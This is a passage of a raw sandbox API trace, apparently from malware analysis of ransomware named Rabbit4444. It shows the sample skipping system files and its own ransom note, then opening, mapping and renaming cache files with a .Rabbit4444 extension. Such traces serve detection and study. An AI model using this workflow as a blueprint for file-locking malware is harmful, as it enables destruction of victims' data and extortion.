"c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\4\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_3[1].txt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0069.713] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0069.713] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16102343101) returned 1 [0069.713] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=49397) returned 1 [0069.713] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0069.713] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d10 [0069.713] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc400, lpName=0x0) returned 0x29c [0069.714] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc400) returned 0x70000 [0069.717] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0069.717] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0069.717] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0069.717] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0069.717] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0069.717] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0069.717] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0069.717] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0069.717] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16102826653) returned 1 [0069.718] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0069.718] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d10 | out: hHeap=0xe0000) returned 1 [0069.718] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0069.718] CloseHandle (hObject=0x29c) returned 1 [0069.718] CloseHandle (hObject=0x280) returned 1 [0069.718] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_3[1].txt.Rabbit4444") returned 197 [0069.718] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_3[1].txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\4\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_3[1].txt"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_3[1].txt.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\4\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_3[1].txt.rabbit4444"), dwFlags=0x1) returned 1 [0069.720] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf8d91a84, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf8d91a84, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xd067ccf2, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x5104, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_4[1].txt", cAlternateFileName="C__WIN~3.TXT")) returned 1 [0069.720] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_4[1].txt", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0069.720] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_4[1].txt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0069.720] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_4[1].txt", lpString2="Rabbit4444.exe") returned -1 [0069.720] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_4[1].txt", lpString2=".") returned 1 [0069.720] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_4[1].txt", lpString2="..") returned 1 [0069.720] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_4[1].txt", lpString2="windows") returned -1 [0069.720] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_4[1].txt", lpString2="bootmgr") returned 1 [0069.720] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_4[1].txt", lpString2="pagefile.sys") returned -1 [0069.720] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_4[1].txt", lpString2="boot") returned 1 [0069.720] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_4[1].txt", lpString2="ids.txt") returned -1 [0069.720] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_4[1].txt", lpString2="NTUSER.DAT") returned -1 [0069.720] lstrcpyW (in: lpString1=0x130ec04, lpString2="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_4[1].txt" | out: lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_4[1].txt") returned="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_4[1].txt" [0069.720] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_4[1].txt", dwFileAttributes=0x2000) returned 1 [0069.721] lstrlenW (lpString="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_4[1].txt") returned 84 [0069.721] lstrlenW (lpString="Rabbit4444") returned 10 [0069.721] lstrcmpiW (lpString1="p_4[1].txt", lpString2="Rabbit4444") returned -1 [0069.721] lstrlenW (lpString=".dll") returned 4 [0069.721] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0069.721] lstrlenW (lpString=".lnk") returned 4 [0069.721] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0069.721] lstrlenW (lpString=".ini") returned 4 [0069.721] lstrcmpiW (lpString1=".txt", lpString2=".ini") returned 1 [0069.721] lstrlenW (lpString=".sys") returned 4 [0069.721] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0069.721] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_4[1].txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\4\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_4[1].txt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0069.721] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0069.721] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16103206120) returned 1 [0069.721] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=20740) returned 1 [0069.721] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0069.721] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1021d8 [0069.721] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5410, lpName=0x0) returned 0x29c [0069.723] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5410) returned 0x70000 [0069.725] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0069.725] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0069.725] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0069.725] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0069.725] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0069.725] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0069.725] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0069.725] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0069.725] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16103618818) returned 1 [0069.725] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0069.726] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1021d8 | out: hHeap=0xe0000) returned 1 [0069.726] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0069.726] CloseHandle (hObject=0x29c) returned 1 [0069.726] CloseHandle (hObject=0x280) returned 1 [0069.726] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_4[1].txt.Rabbit4444") returned 197 [0069.726] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_4[1].txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\4\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_4[1].txt"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_4[1].txt.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\4\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_4[1].txt.rabbit4444"), dwFlags=0x1) returned 1 [0069.727] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf8e2a3f7, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf8e2a3f7, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x7ab72e08, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x87c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_5[1].txt", cAlternateFileName="C__WIN~4.TXT")) returned 1 [0069.727] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_5[1].txt", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0069.727] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_5[1].txt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0069.727] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_5[1].txt", lpString2="Rabbit4444.exe") returned -1 [0069.727] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_5[1].txt", lpString2=".") returned 1 [0069.727] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_5[1].txt", lpString2="..") returned 1 [0069.727] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_5[1].txt", lpString2="windows") returned -1 [0069.727] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_5[1].txt", lpString2="bootmgr") returned 1 [0069.727] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_5[1].txt", lpString2="pagefile.sys") returned -1 [0069.727] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_5[1].txt", lpString2="boot") returned 1 [0069.727] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_5[1].txt", lpString2="ids.txt") returned -1 [0069.727] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_5[1].txt", lpString2="NTUSER.DAT") returned -1 [0069.727] lstrcpyW (in: lpString1=0x130ec04, lpString2="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_5[1].txt" | out: lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_5[1].txt") returned="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_5[1].txt" [0069.727] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_5[1].txt", dwFileAttributes=0x2000) returned 1 [0069.728] lstrlenW (lpString="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_5[1].txt") returned 84 [0069.728] lstrlenW (lpString="Rabbit4444") returned 10 [0069.728] lstrcmpiW (lpString1="p_5[1].txt", lpString2="Rabbit4444") returned -1 [0069.728] lstrlenW (lpString=".dll") returned 4 [0069.728] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0069.728] lstrlenW (lpString=".lnk") returned 4 [0069.728] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0069.728] lstrlenW (lpString=".ini") returned 4 [0069.728] lstrcmpiW (lpString1=".txt", lpString2=".ini") returned 1 [0069.728] lstrlenW (lpString=".sys") returned 4 [0069.728] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0069.728] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_5[1].txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\4\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_5[1].txt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0069.759] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0069.759] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16106975654) returned 1 [0069.759] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=2172) returned 1 [0069.759] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0069.759] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0069.759] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xb80, lpName=0x0) returned 0x29c [0069.768] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xb80) returned 0x70000 [0069.770] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0069.770] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0069.770] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0069.770] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0069.770] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0069.770] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0069.770] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0069.770] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0069.770] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16108109529) returned 1 [0069.770] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0069.770] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0069.770] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0069.771] CloseHandle (hObject=0x29c) returned 1 [0069.771] CloseHandle (hObject=0x280) returned 1 [0069.771] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_5[1].txt.Rabbit4444") returned 197 [0069.771] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_5[1].txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\4\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_5[1].txt"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_5[1].txt.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\4\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_5[1].txt.rabbit4444"), dwFlags=0x1) returned 1 [0069.772] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf8e50659, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf8e50659, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xd067ccf2, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0xb3b2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_6[1].txt", cAlternateFileName="C_345C~1.TXT")) returned 1 [0069.772] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_6[1].txt", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0069.772] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_6[1].txt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0069.772] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_6[1].txt", lpString2="Rabbit4444.exe") returned -1 [0069.772] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_6[1].txt", lpString2=".") returned 1 [0069.772] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_6[1].txt", lpString2="..") returned 1 [0069.772] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_6[1].txt", lpString2="windows") returned -1 [0069.772] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_6[1].txt", lpString2="bootmgr") returned 1 [0069.772] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_6[1].txt", lpString2="pagefile.sys") returned -1 [0069.772] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_6[1].txt", lpString2="boot") returned 1 [0069.772] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_6[1].txt", lpString2="ids.txt") returned -1 [0069.772] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_6[1].txt", lpString2="NTUSER.DAT") returned -1 [0069.772] lstrcpyW (in: lpString1=0x130ec04, lpString2="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_6[1].txt" | out: lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_6[1].txt") returned="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_6[1].txt" [0069.772] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_6[1].txt", dwFileAttributes=0x2000) returned 1 [0069.772] lstrlenW (lpString="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_6[1].txt") returned 84 [0069.772] lstrlenW (lpString="Rabbit4444") returned 10 [0069.772] lstrcmpiW (lpString1="p_6[1].txt", lpString2="Rabbit4444") returned -1 [0069.772] lstrlenW (lpString=".dll") returned 4 [0069.773] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0069.773] lstrlenW (lpString=".lnk") returned 4 [0069.773] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0069.773] lstrlenW (lpString=".ini") returned 4 [0069.773] lstrcmpiW (lpString1=".txt", lpString2=".ini") returned 1 [0069.773] lstrlenW (lpString=".sys") returned 4 [0069.773] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0069.773] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_6[1].txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\4\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_6[1].txt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0069.773] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0069.773] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16108403154) returned 1 [0069.773] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=46002) returned 1 [0069.773] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0069.773] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0069.773] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xb6c0, lpName=0x0) returned 0x29c [0069.777] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xb6c0) returned 0x70000 [0069.780] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0069.780] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0069.780] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0069.780] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0069.780] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0069.780] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0069.780] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0069.780] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 